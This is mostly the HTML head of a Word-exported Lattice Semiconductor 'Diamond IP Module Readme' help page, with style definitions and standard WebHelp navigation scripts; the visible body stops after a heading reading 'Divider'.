<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:p="urn:schemas-microsoft-com:office:powerpoint"
xmlns:oa="urn:schemas-microsoft-com:office:activation"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:st1="urn:schemas-microsoft-com:office:smarttags"
xmlns="http://www.w3.org/TR/REC-html40">
<!--(==============================================================)-->
<!--(Document created with RoboEditor. )============================-->
<!--(==============================================================)-->

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 14">
<meta name=Originator content="Microsoft Word 14">
<link rel=File-List href="readme_files/filelist.xml">
<link rel=Edit-Time-Data href="readme_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title>Diamond IP Module Readme</title>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="place"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="address"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="country-region"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="PostalCode"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="State"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="City"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
 name="Street"/>
<!--[if gte mso 9]><xml>
 <o:DocumentProperties>
  <o:Author>ashimi</o:Author>
  <o:LastAuthor>Junguo Zhang</o:LastAuthor>
  <o:Revision>124</o:Revision>
  <o:TotalTime>334</o:TotalTime>
  <o:Created>2008-10-03T19:00:00Z</o:Created>
  <o:LastSaved>2012-05-08T02:02:00Z</o:LastSaved>
  <o:Pages>2</o:Pages>
  <o:Words>1135</o:Words>
  <o:Characters>6476</o:Characters>
  <o:Company>Lattice Semiconductor Corp</o:Company>
  <o:Lines>53</o:Lines>
  <o:Paragraphs>15</o:Paragraphs>
  <o:CharactersWithSpaces>7596</o:CharactersWithSpaces>
  <o:Version>14.00</o:Version>
 </o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="readme_files/themedata.thmx">
<link rel=colorSchemeMapping href="readme_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
 <w:WordDocument>
  <w:Zoom>110</w:Zoom>
  <w:SpellingState>Clean</w:SpellingState>
  <w:GrammarState>Clean</w:GrammarState>
  <w:TrackMoves>false</w:TrackMoves>
  <w:TrackFormatting/>
  <w:ValidateAgainstSchemas/>
  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
  <w:DoNotPromoteQF/>
  <w:LidThemeOther>EN-US</w:LidThemeOther>
  <w:LidThemeAsian>ZH-CN</w:LidThemeAsian>
  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
  <w:Compatibility>
   <w:BreakWrappedTables/>
   <w:SplitPgBreakAndParaMark/>
   <w:UseFELayout/>
  </w:Compatibility>
  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
  <m:mathPr>
   <m:mathFont m:val="Cambria Math"/>
   <m:brkBin m:val="before"/>
   <m:brkBinSub m:val="&#45;-"/>
   <m:smallFrac m:val="off"/>
   <m:dispDef/>
   <m:lMargin m:val="0"/>
   <m:rMargin m:val="0"/>
   <m:defJc m:val="centerGroup"/>
   <m:wrapIndent m:val="1440"/>
   <m:intLim m:val="subSup"/>
   <m:naryLim m:val="undOvr"/>
  </m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
 <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
  DefSemiHidden="false" DefQFormat="false" LatentStyleCount="267">
  <w:LsdException Locked="false" QFormat="true" Name="Normal"/>
  <w:LsdException Locked="false" QFormat="true" Name="heading 1"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 2"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 3"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 4"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 5"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 6"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 7"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 8"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="heading 9"/>
  <w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
   QFormat="true" Name="caption"/>
  <w:LsdException Locked="false" QFormat="true" Name="Title"/>
  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
  <w:LsdException Locked="false" QFormat="true" Name="Subtitle"/>
  <w:LsdException Locked="false" QFormat="true" Name="Strong"/>
  <w:LsdException Locked="false" QFormat="true" Name="Emphasis"/>
  <w:LsdException Locked="false" Priority="99" Name="No List"/>
  <w:LsdException Locked="false" Priority="99" SemiHidden="true"
   Name="Placeholder Text"/>
  <w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
  <w:LsdException Locked="false" Priority="99" SemiHidden="true" Name="Revision"/>
  <w:LsdException Locked="false" Priority="34" QFormat="true"
   Name="List Paragraph"/>
  <w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
  <w:LsdException Locked="false" Priority="30" QFormat="true"
   Name="Intense Quote"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
  <w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
  <w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
  <w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
  <w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
  <w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
  <w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
  <w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
  <w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
  <w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
  <w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
  <w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
  <w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
  <w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
  <w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
  <w:LsdException Locked="false" Priority="19" QFormat="true"
   Name="Subtle Emphasis"/>
  <w:LsdException Locked="false" Priority="21" QFormat="true"
   Name="Intense Emphasis"/>
  <w:LsdException Locked="false" Priority="31" QFormat="true"
   Name="Subtle Reference"/>
  <w:LsdException Locked="false" Priority="32" QFormat="true"
   Name="Intense Reference"/>
  <w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
  <w:LsdException Locked="false" Priority="37" SemiHidden="true"
   UnhideWhenUsed="true" Name="Bibliography"/>
  <w:LsdException Locked="false" Priority="39" SemiHidden="true"
   UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
 </w:LatentStyles>
</xml><![endif]--><!--[if !mso]><object
 classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id=ieooui></object>
<style>
st1\:*{behavior:url(#ieooui) }
</style>
<![endif]-->
<style>
<!--table.WHS1
	{x-cell-content-align: Center;
	border-spacing: 0px;
	border-spacing: 0px;}
col.whs2 {width: 100%;}
tr.WHS3
	{x-cell-content-align: center;}
table.WHS5
	{x-cell-content-align: top;
	border-spacing: 4px;
	border-spacing: 4px;}
col.whs6 {width: 100px;}
col.whs7 {width: 300px;}
tr.WHS8
	{x-cell-content-align: top;}
div.WEBHELPPOPUPMENU
	{left:0px;
	position:absolute;
	top:0px;
	visibility:hidden;
	z-index:4;}

 /* Font Definitions */
 @font-face
	{font-family:SimSun;
	panose-1:2 1 6 0 3 1 1 1 1 1;
	mso-font-alt:SimSun;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:3 680460288 22 0 262145 0;}
@font-face
	{font-family:SimSun;
	panose-1:2 1 6 0 3 1 1 1 1 1;
	mso-font-alt:SimSun;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:3 680460288 22 0 262145 0;}
@font-face
	{font-family:SimSun;
	panose-1:2 1 6 0 3 1 1 1 1 1;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:3 680460288 22 0 262145 0;}
@font-face
	{font-family:Verdana;
	panose-1:2 11 6 4 3 5 4 4 2 4;
	mso-font-charset:0;
	mso-generic-font-family:swiss;
	mso-font-pitch:variable;
	mso-font-signature:-1593833729 1073750107 16 0 415 0;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{mso-style-unhide:no;
	mso-style-qformat:yes;
	mso-style-parent:"";
	margin:0cm;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;}
h1
	{mso-style-unhide:no;
	mso-style-qformat:yes;
	mso-style-link:"Heading 1 Char";
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	mso-pagination:widow-orphan;
	mso-outline-level:1;
	font-size:24.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	font-weight:bold;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
	{mso-style-unhide:no;
	mso-style-link:"Body Text Char";
	margin:0cm;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:10.0pt;
	font-family:"Verdana","sans-serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;
	mso-bidi-font-family:"Times New Roman";}
a:link, span.MsoHyperlink
	{mso-style-unhide:no;
	color:blue;
	text-decoration:underline;
	text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-unhide:no;
	color:blue;
	text-decoration:underline;
	text-underline:single;}
p
	{mso-style-unhide:no;
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;}
span.Heading1Char
	{mso-style-name:"Heading 1 Char";
	mso-style-unhide:no;
	mso-style-locked:yes;
	mso-style-link:"Heading 1";
	mso-ansi-font-size:22.0pt;
	mso-bidi-font-size:22.0pt;
	mso-font-kerning:22.0pt;
	font-weight:bold;}
span.BodyTextChar
	{mso-style-name:"Body Text Char";
	mso-style-unhide:no;
	mso-style-locked:yes;
	mso-style-link:"Body Text";
	mso-ansi-font-size:12.0pt;
	mso-bidi-font-size:12.0pt;}
p.webhelpnavbar, li.webhelpnavbar, div.webhelpnavbar
	{mso-style-name:webhelpnavbar;
	mso-style-unhide:no;
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	text-align:right;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;}
p.table, li.table, div.table
	{mso-style-name:table;
	mso-style-unhide:no;
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;}
p.bullet, li.bullet, div.bullet
	{mso-style-name:bullet;
	mso-style-unhide:no;
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;}
p.style2, li.style2, div.style2
	{mso-style-name:style2;
	mso-style-unhide:no;
	mso-margin-top-alt:auto;
	margin-right:0cm;
	mso-margin-bottom-alt:auto;
	margin-left:0cm;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Arial","sans-serif";
	mso-fareast-font-family:SimSun;
	mso-fareast-theme-font:minor-fareast;
	font-weight:bold;}
span.style21
	{mso-style-name:style21;
	mso-style-unhide:no;
	font-family:"Arial","sans-serif";
	mso-ascii-font-family:Arial;
	mso-hansi-font-family:Arial;
	mso-bidi-font-family:Arial;
	font-weight:bold;}
span.msonormal0
	{mso-style-name:msonormal;
	mso-style-unhide:no;}
span.SpellE
	{mso-style-name:"";
	mso-spl-e:yes;}
span.GramE
	{mso-style-name:"";
	mso-gram-e:yes;}
.MsoChpDefault
	{mso-style-type:export-only;
	mso-default-props:yes;
	font-size:10.0pt;
	mso-ansi-font-size:10.0pt;
	mso-bidi-font-size:10.0pt;
	mso-ascii-font-family:"Times New Roman";
	mso-hansi-font-family:"Times New Roman";
	mso-font-kerning:0pt;}
@page WordSection1
	{size:612.0pt 792.0pt;
	margin:72.0pt 90.0pt 72.0pt 90.0pt;
	mso-header-margin:36.0pt;
	mso-footer-margin:36.0pt;
	mso-paper-source:0;}
div.WordSection1
	{page:WordSection1;}
 /* List Definitions */
 @list l0
	{mso-list-id:330909628;
	mso-list-type:hybrid;
	mso-list-template-ids:-2021601562 -1008183850 1872950780 1375756338 -1199439710 -1990456762 -1523836294 235070938 1479282484 -1330340198;}
@list l0:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:36.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l0:level2
	{mso-level-tab-stop:72.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level3
	{mso-level-tab-stop:108.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level4
	{mso-level-tab-stop:144.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level5
	{mso-level-tab-stop:180.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level6
	{mso-level-tab-stop:216.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level7
	{mso-level-tab-stop:252.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level8
	{mso-level-tab-stop:288.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l0:level9
	{mso-level-tab-stop:324.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1
	{mso-list-id:614560566;
	mso-list-type:hybrid;
	mso-list-template-ids:1438953124 999560470 964717536 -559239814 -1337281044 -1332968916 1701985288 1584275974 -1703228768 149815354;}
@list l1:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:36.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l1:level2
	{mso-level-tab-stop:72.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level3
	{mso-level-tab-stop:108.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level4
	{mso-level-tab-stop:144.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level5
	{mso-level-tab-stop:180.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level6
	{mso-level-tab-stop:216.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level7
	{mso-level-tab-stop:252.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level8
	{mso-level-tab-stop:288.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l1:level9
	{mso-level-tab-stop:324.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2
	{mso-list-id:830101582;
	mso-list-type:hybrid;
	mso-list-template-ids:-349007820 -1509500386 1336053938 2050660728 -134698014 -1980829530 -668842378 -1946898180 642413088 -908529818;}
@list l2:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:36.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l2:level2
	{mso-level-tab-stop:72.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level3
	{mso-level-tab-stop:108.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level4
	{mso-level-tab-stop:144.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level5
	{mso-level-tab-stop:180.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level6
	{mso-level-tab-stop:216.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level7
	{mso-level-tab-stop:252.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level8
	{mso-level-tab-stop:288.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l2:level9
	{mso-level-tab-stop:324.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3
	{mso-list-id:1392772861;
	mso-list-type:hybrid;
	mso-list-template-ids:-1550669338 1721936462 215632760 -1180028214 -632539924 -1135543956 1316230788 1206449994 -2003172486 -1343213354;}
@list l3:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:36.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l3:level2
	{mso-level-tab-stop:72.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level3
	{mso-level-tab-stop:108.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level4
	{mso-level-tab-stop:144.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level5
	{mso-level-tab-stop:180.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level6
	{mso-level-tab-stop:216.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level7
	{mso-level-tab-stop:252.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level8
	{mso-level-tab-stop:288.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l3:level9
	{mso-level-tab-stop:324.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4
	{mso-list-id:1907180906;
	mso-list-type:hybrid;
	mso-list-template-ids:2024986148 -945282540 -1303980334 -1173565196 -929497328 -936585402 830118026 1468553028 810846710 1197665106;}
@list l4:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:36.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
@list l4:level2
	{mso-level-tab-stop:72.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level3
	{mso-level-tab-stop:108.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level4
	{mso-level-tab-stop:144.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level5
	{mso-level-tab-stop:180.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level6
	{mso-level-tab-stop:216.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level7
	{mso-level-tab-stop:252.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level8
	{mso-level-tab-stop:288.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
@list l4:level9
	{mso-level-tab-stop:324.0pt;
	mso-level-number-position:left;
	text-indent:-18.0pt;}
ol
	{margin-bottom:0cm;}
ul
	{margin-bottom:0cm;}
-->
</style>
<!--[if gte mso 10]>
<style>
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:"Table Normal";
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-priority:99;
	mso-style-parent:"";
	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
	mso-para-margin:0cm;
	mso-para-margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:10.0pt;
	font-family:"Times New Roman","serif";}
</style>
<![endif]--><!--(Meta)==========================================================-->
<meta name=generator-major-version content=0.1>
<meta name=generator-minor-version content=1>
<meta name=filetype content=kadov>
<meta name=filetype-version content=1>
<meta name=page-count content=1>
<meta name=layout-height content=3793>
<meta name=layout-width content=660>
<!--(Links)=========================================================--><!--(Scripts)=======================================================-->
<script language="JavaScript"  type="text/javascript" title="WebHelpSplitCss">
<!--
if (navigator.appName !="Netscape")
{   document.write("<link rel='stylesheet' href='default.css'>");}
//-->
</script>

<script language="JavaScript"  type="text/javascript" title="WebHelpInlineScript">
<!--
function reDo() {
  if (innerWidth != origWidth || innerHeight != origHeight)
     location.reload();
}
if ((parseInt(navigator.appVersion) == 4) && (navigator.appName == "Netscape")) {
	origWidth = innerWidth;
	origHeight = innerHeight;
	onresize = reDo;
}
onerror = null; 
//-->
</script>

<script language="javascript1.2"  type="text/javascript" src="whmsg.js">
</script>

<script language="JavaScript"  type="text/javascript" src="whver.js">
</script>

<script language="javascript1.2"  type="text/javascript" src="whproxy.js">
</script>

<script language="javascript1.2"  type="text/javascript" src="whutils.js">
</script>

<script language="javascript1.2"  type="text/javascript" src="whtopic.js">
</script>

<script language="javascript1.2"  type="text/javascript">
<!--
if (window.gbWhTopic)
{
	if (window.setRelStartPage)
	{
	
	}


	if (window.setRelStartPage)
	{
	setRelStartPage("ip_tutor.htm");

		autoSync(1);
		sendSyncInfo();
		sendAveInfoOut();
	}

}
else
	if (window.gbIE4)
		document.location.reload();
//-->
</script>
<!--[if gte mso 9]><xml>
 <o:shapedefaults v:ext="edit" spidmax="1026"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
 <o:shapelayout v:ext="edit">
  <o:idmap v:ext="edit" data="1"/>
 </o:shapelayout></xml><![endif]-->
</head>

<!--(Body)==========================================================-->

<body lang=ZH-CN link=blue vlink=blue style='tab-interval:36.0pt'>

<div class=WordSection1>

<h1><span lang=EN-US style='font-family:"Verdana","sans-serif";color:#ED6F25'>Divider
